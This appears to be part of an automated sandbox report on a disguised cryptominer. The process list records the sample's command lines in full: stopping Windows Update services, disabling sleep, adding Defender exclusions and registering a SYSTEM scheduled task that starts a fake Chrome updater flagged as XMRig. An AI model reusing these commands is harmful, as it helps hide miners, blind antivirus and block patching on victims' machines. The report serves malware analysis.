                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop dosvc
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:12
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                            Imagebase:0x7ff71ed80000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:14
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\dialer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\dialer.exe
                            Imagebase:0x7ff762260000
                            File size:39'936 bytes
                            MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:15
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\powercfg.exe
                            Wow64 process (32bit):false
                            Commandline:powercfg /x -hibernate-timeout-ac 0
                            Imagebase:0x7ff7bfb70000
                            File size:96'256 bytes
                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                            Imagebase:0x7ff775920000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\winlogon.exe
                            Wow64 process (32bit):false
                            Commandline:winlogon.exe
                            Imagebase:0x7ff6488b0000
                            File size:944'128 bytes
                            MD5 hash:A987B43E6A8E8F894B98A3DF022DB518
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:19
                            Start time:09:35:44
                            Start date:12/08/2024
                            Path:C:\Windows\System32\powercfg.exe
                            Wow64 process (32bit):false
                            Commandline:powercfg /x -hibernate-timeout-dc 0
                            Imagebase:0x7ff7bfb70000
                            File size:96'256 bytes
                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:09:35:45
                            Start date:12/08/2024
                            Path:C:\Windows\System32\powercfg.exe
                            Wow64 process (32bit):false
                            Commandline:powercfg /x -standby-timeout-ac 0
                            Imagebase:0x7ff7bfb70000
                            File size:96'256 bytes
                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:09:35:45
                            Start date:12/08/2024
                            Path:C:\Windows\System32\powercfg.exe
                            Wow64 process (32bit):false
                            Commandline:powercfg /x -standby-timeout-dc 0
                            Imagebase:0x7ff7bfb70000
                            File size:96'256 bytes
                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:09:35:45
                            Start date:12/08/2024
                            Path:C:\Windows\System32\lsass.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\lsass.exe
                            Imagebase:0x7ff6ba2e0000
                            File size:59'448 bytes
                            MD5 hash:15A556DEF233F112D127025AB51AC2D3
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:23
                            Start time:09:35:46
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:24
                            Start time:09:35:46
                            Start date:12/08/2024
                            Path:C:\Windows\System32\dwm.exe
                            Wow64 process (32bit):false
                            Commandline:"dwm.exe"
                            Imagebase:0x7ff6692f0000
                            File size:94'720 bytes
                            MD5 hash:5C27608411832C5B39BA04E33D53536C
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:25
                            Start time:09:35:49
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:26
                            Start time:09:35:50
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:27
                            Start time:09:35:50
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:30
                            Start time:09:35:50
                            Start date:12/08/2024
                            Path:C:\Program Files\Google\Chrome\updater.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\updater.exe"
                            Imagebase:0x7ff62dcc0000
                            File size:5'986'304 bytes
                            MD5 hash:80B97CC01243BE6495F5DF52BCDD6BDF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmp, Author: unknown
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 55%, Virustotal
                            Has exited:true

                            Target ID:31
                            Start time:09:35:50
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:32
                            Start time:09:35:51
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:33
                            Start time:09:35:52
                            Start date:12/08/2024
                            Path:C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe
                            Imagebase:0x7ff7924f0000
                            File size:365'360 bytes
                            MD5 hash:B6BAD2BD8596D9101874E9042B8E2D63
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:34
                            Start time:09:35:52
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:35
                            Start time:09:35:52
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:36
                            Start time:09:35:52
                            Start date:12/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                            Imagebase:0x7ff775920000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:09:35:52
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:09:35:54
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:39
                            Start time:09:35:55
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:40
                            Start time:09:35:55
                            Start date:12/08/2024
                            Path:C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe
                            Imagebase:0x7ff69f760000
                            File size:521'536 bytes
                            MD5 hash:3B0DF35583675DE5A08E8D4C1271CEC0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:41
                            Start time:09:35:55
                            Start date:12/08/2024
                            Path:C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe
                            Imagebase:0x7ff7733d0000
                            File size:399'664 bytes
                            MD5 hash:91038D45A86B5465E8B7E5CD63187150
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:42
                            Start time:09:35:55
                            Start date:12/08/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                            Imagebase:0x7ff71ed80000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:43
                            Start time:09:35:55
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:44
                            Start time:09:35:55
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop UsoSvc
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:45
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop WaaSMedicSvc
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:46
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop wuauserv
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:47
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            Imagebase:0x7ff6e3720000
                            File size:57'360 bytes
                            MD5 hash:F586835082F632DC8D9404D83BC16316
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:48
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop bits
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:49
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc stop dosvc
                            Imagebase:0x7ff7c54f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:50
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                            Imagebase:0x7ff71ed80000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:51
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:52
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\powercfg.exe
                            Wow64 process (32bit):false
                            Commandline:powercfg /x -hibernate-timeout-ac 0
                            Imagebase:0x7ff7bfb70000
                            File size:96'256 bytes
                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:53
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\dialer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\dialer.exe
                            Imagebase:0x7ff762260000
                            File size:39'936 bytes
                            MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:54
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                            Imagebase:0x7ff60ef50000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:55
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60ef50000
                            File size:875'008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:56
                            Start time:09:35:56
                            Start date:12/08/2024
                            Path:C:\Windows\System32\powercfg.exe
                            Wow64 process (32bit):false
                            Commandline:powercfg /x -hibernate-timeout-dc 0
                            Imagebase:0x7ff7bfb70000
                            File size:96'256 bytes
                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            No disassembly